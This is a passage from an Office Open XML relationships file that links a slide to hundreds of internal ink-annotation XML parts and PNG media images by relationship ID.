Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink293.xml"/><Relationship Id="rId670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image300.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink73.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink94.xml"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink193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216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375.xml"/><Relationship Id="rId737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink403.xml"/><Relationship Id="rId779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink424.xml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69.png"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink200.xml"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.png"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink304.xml"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink326.xml"/><Relationship Id="rId639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink354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2.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink106.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink137.xml"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink158.xml"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink234.xml"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink255.xml"/><Relationship Id="rId650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image290.png"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink173.xml"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink276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.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink45.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink84.xml"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink206.xml"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink227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442.xml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68.xml"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125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365.xml"/><Relationship Id="rId717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink393.xml"/><Relationship Id="rId759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink414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59.png"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink184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294.xml"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image247.png"/><Relationship Id="rId619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink344.xml"/><Relationship Id="rId770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3501.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink56.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink95.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink127.xml"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink245.xml"/><Relationship Id="rId826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image378.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink148.xml"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink266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74.xml"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink194.xml"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink217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781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink425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355.xml"/><Relationship Id="rId683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink376.xml"/><Relationship Id="rId739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink404.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink159.xml"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink284.xml"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink305.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink85.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink108.xml"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image155.png"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink235.xml"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink327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3.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink138.xml"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink256.xml"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink277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.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink175.xml"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink207.xml"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image222.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink47.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink228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415.xml"/><Relationship Id="rId817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink443.xml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345.xml"/><Relationship Id="rId663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink366.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink149.xml"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink186.xml"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink295.xml"/><Relationship Id="rId719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink394.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink58.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink75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96.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink128.xml"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink246.xml"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink267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50.png"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink195.xml"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink218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405.xml"/><Relationship Id="rId783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink426.xml"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95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335.xml"/><Relationship Id="rId643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink356.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink139.xml"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink377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61.xml"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink160.xml"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink285.xml"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink306.xml"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink328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4.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink86.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink110.xml"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink229.xml"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink236.xml"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink257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278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3.xml"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink177.xml"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink208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395.xml"/><Relationship Id="rId763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink416.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink49.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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444.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink129.xml"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.png"/><Relationship Id="rId623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink346.xml"/><Relationship Id="rId665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink367.xml"/><Relationship Id="rId830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image380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0.xml"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink188.xml"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink296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60.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink76.xml"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink97.xml"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink219.xml"/><Relationship Id="rId774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image352.png"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink247.xml"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink268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13.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.png"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink196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385.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink34.xml"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72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406.xml"/><Relationship Id="rId785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink427.xml"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink119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336.xml"/><Relationship Id="rId645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink357.xml"/><Relationship Id="rId687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink378.xml"/><Relationship Id="rId810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image370.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink140.xml"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink161.xml"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink279.xml"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink286.xml"/><Relationship Id="rId712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image321.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink40.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink63.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink87.xml"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink307.xml"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink329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51.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink112.xml"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink209.xml"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink230.xml"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink237.xml"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink258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445.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.png"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink179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4.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink190.xml"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink313.xml"/><Relationship Id="rId723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink396.xml"/><Relationship Id="rId765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink417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347.xml"/><Relationship Id="rId832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image381.png"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink130.xml"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink151.xml"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink269.xml"/><Relationship Id="rId667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36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7.xml"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink297.xml"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink319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35.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink98.xml"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink197.xml"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink220.xml"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink248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435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14.xml"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink170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386.xml"/><Relationship Id="rId745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink407.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73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330.xml"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink337.xml"/><Relationship Id="rId787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink428.xml"/><Relationship Id="rId812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image371.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink120.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink141.xml"/><Relationship Id="rId647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink358.xml"/><Relationship Id="rId689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink379.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink162.xml"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink259.xml"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink280.xml"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink287.xml"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink308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5.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink65.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink88.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink113.xml"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink181.xml"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink210.xml"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink231.xml"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink238.xml"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink314.xml"/><Relationship Id="rId798" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image364.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink53.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87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446.xml"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129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397.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink192.xml"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId767" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink418.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink320.xml"/><Relationship Id="rId627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink348.xml"/><Relationship Id="rId669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink369.xml"/><Relationship Id="rId834" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image382.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink131.xml"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink152.xml"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink249.xml"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink270.xml"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink298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15.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink78.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink99.xml"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink199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36.xml"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink221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436.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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387.xml"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink172.xml"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.png"/><Relationship Id="rId691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink380.xml"/><Relationship Id="rId747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink408.xml"/><Relationship Id="rId789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink429.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink44.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink105.xml"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image159.png"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink309.xml"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink331.xml"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink338.xml"/><Relationship Id="rId649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink359.xml"/><Relationship Id="rId814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image372.png"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink114.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink121.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink142.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink163.xml"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink239.xml"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink260.xml"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink288.xml"/><Relationship Id="rId660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2951.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink67.xml"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink183.xml"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink281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55.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink89.xml"/><Relationship Id="rId355" 